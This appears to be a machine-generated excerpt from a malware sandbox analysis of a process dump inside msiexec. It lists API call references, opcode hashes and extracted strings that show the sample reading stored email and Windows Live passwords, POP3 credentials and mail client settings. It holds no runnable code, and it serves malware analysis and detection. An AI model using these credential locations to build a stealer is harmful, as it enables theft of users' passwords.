                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$FreeLibraryLoadLocalmemcpymemsetwcschrwcslenwcsncmp
                                                              • String ID: J$Microsoft_WinInet
                                                              • API String ID: 3318079752-260894208
                                                              • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                              • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                                              • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                                              • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                                              APIs
                                                              • memset.MSVCRT ref: 004037EB
                                                              • memset.MSVCRT ref: 004037FF
                                                                • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                              • strchr.MSVCRT ref: 0040386E
                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                              • strlen.MSVCRT ref: 00403897
                                                              • sprintf.MSVCRT ref: 004038B7
                                                              • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_mbscpystrlen$memcpysprintfstrchr
                                                              • String ID: %s@yahoo.com
                                                              • API String ID: 2240714685-3288273942
                                                              • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                              • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                              • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                                                              • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                                                              APIs
                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              • _mbscpy.MSVCRT(0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409686
                                                              • _mbscpy.MSVCRT(0045A550,general,0045A448,00000000,?,00000000,0040972B,00000000,?,00000000,00000104), ref: 00409696
                                                              • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                                                • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                              • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                              • API String ID: 888011440-2039793938
                                                              • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                              • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                                              • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                                              • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                                              APIs
                                                              Strings
                                                              • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                                              • unable to open database: %s, xrefs: 0042EBD6
                                                              • database %s is already in use, xrefs: 0042E9CE
                                                              • database is already attached, xrefs: 0042EA97
                                                              • too many attached databases - max %d, xrefs: 0042E951
                                                              • cannot ATTACH database within transaction, xrefs: 0042E966
                                                              • out of memory, xrefs: 0042EBEF
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                              • API String ID: 1297977491-2001300268
                                                              • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                              • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                                              • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                                              • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                                              APIs
                                                                • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                              • strchr.MSVCRT ref: 0040327B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringstrchr
                                                              • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                              • API String ID: 1348940319-1729847305
                                                              • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                                              • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                                              • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                                              APIs
                                                              • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                              • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                              • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                              • API String ID: 3510742995-3273207271
                                                              • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                              • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                                              • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                                              • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F567
                                                              • memset.MSVCRT ref: 0040F57F
                                                                • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                              • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: QueryValuememset$AddressFreeLibraryLoadLocalProc_mbscpy_mbsnbcatmemcpy
                                                              • String ID:
                                                              • API String ID: 78143705-3916222277
                                                              • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                              • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                              • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                                                              • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                                                              APIs
                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                              • memset.MSVCRT ref: 0040FA1E
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                              • _strnicmp.MSVCRT ref: 0040FA4F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                              • String ID: WindowsLive:name=*$windowslive:name=
                                                              • API String ID: 945165440-3589380929
                                                              • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                              • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                                              • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                                              • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                                              APIs
                                                              • memset.MSVCRT ref: 0040F84A
                                                              • RegQueryValueExA.ADVAPI32(?,ps:password,00000000,?), ref: 0040F8A0
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,000000FF,00000000,00000000), ref: 0040F919
                                                              • LocalFree.KERNEL32(?), ref: 0040F92C
                                                              • RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ByteCharEnumFreeLocalMultiQueryValueWidememset
                                                              • String ID: Creds$ps:password
                                                              • API String ID: 2290531041-1872227768
                                                              • Opcode ID: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                              • Instruction ID: 67353d5813bb88842fab764933eebe3fab3d63e3b23d31051d6557c10b379f88
                                                              • Opcode Fuzzy Hash: 402bd8f731a67ceae123d72f61a5f8da3e135295bef40cbb490a0d19221e27d4
                                                              • Instruction Fuzzy Hash: 71412BB6901209AFDB61DF95DC84EEFBBBCEB48715F0000B6F905E2150DA349A54CF64
                                                              APIs
                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                              • strchr.MSVCRT ref: 0040371F
                                                              • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                              • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                              • strlen.MSVCRT ref: 00403778
                                                              • sprintf.MSVCRT ref: 0040379C
                                                              • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                              • String ID: %s@gmail.com
                                                              • API String ID: 3261640601-4097000612
                                                              • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                              • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                                              • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                                              • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                                              APIs
                                                              • memset.MSVCRT ref: 004094C8
                                                              • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                              • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                              • memset.MSVCRT ref: 0040950C
                                                              • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                              • _strcmpi.MSVCRT ref: 00409531
                                                                • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                              • String ID: sysdatetimepick32
                                                              • API String ID: 3411445237-4169760276
                                                              • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                              • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                                              • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                                              • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                                              APIs
                                                              • memset.MSVCRT ref: 00403504
                                                              • memset.MSVCRT ref: 0040351A
                                                              • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 0040356D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _mbscatmemset$_mbscpystrlen
                                                              • String ID: InstallPath$Software\Group Mail$fb.dat
                                                              • API String ID: 632640181-966475738
                                                              • Opcode ID: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                              • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                                                              • Opcode Fuzzy Hash: 92019086d1fb7d202bc52a9da7d86f13d8a69774ff3458b2053dbeb140317cc9
                                                              • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                                                              APIs
                                                              • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                              • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                              • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                              • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                              • GetSysColor.USER32(0000000F), ref: 0040B472
                                                              • DeleteObject.GDI32(?), ref: 0040B4A6
                                                              • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                              • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$DeleteImageLoadObject$Color
                                                              • String ID:
                                                              • API String ID: 3642520215-0
                                                              • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                                              • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                                              • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                                              APIs
                                                              • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                              • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                              • GetDC.USER32(00000000), ref: 004072FB
                                                              • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                              • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                              • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                              • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                              • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                              • String ID:
                                                              • API String ID: 1999381814-0
                                                              • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                                              • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                                              • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                              • API String ID: 1297977491-3883738016
                                                              • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                                              • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                                              • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                                              APIs
                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                              • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                              • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID: gj
                                                              • API String ID: 438689982-4203073231
                                                              • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                              • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                                              • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                                              • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: __aulldvrm$__aullrem
                                                              • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                              • API String ID: 643879872-978417875
                                                              • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                                              • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                                              • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                                              APIs
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                              • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                              • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                              • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                              • memset.MSVCRT ref: 004058C3
                                                              • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                              • SetFocus.USER32(?), ref: 00405976
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$FocusItemmemset
                                                              • String ID:
                                                              • API String ID: 4281309102-0
                                                              • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                              • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                                              • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                                              • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                                              APIs
                                                                • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                              • _mbscat.MSVCRT ref: 0040A8FF
                                                              • sprintf.MSVCRT ref: 0040A921
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileWrite_mbscatsprintfstrlen
                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                              • API String ID: 1631269929-4153097237
                                                              • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                              • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                                              • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                                              • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                                              APIs
                                                              • memset.MSVCRT ref: 0040810E
                                                                • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                              • LocalFree.KERNEL32(?,?,?,?,?,00000000,67CE7B60,?), ref: 004081B9
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                              • String ID: POP3_credentials$POP3_host$POP3_name
                                                              • API String ID: 524865279-2190619648
                                                              • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                              • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                              • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                              • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ItemMenu$CountInfomemsetstrchr
                                                              • String ID: 0$6
                                                              • API String ID: 2300387033-3849865405
                                                              • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                                              • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                                              • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
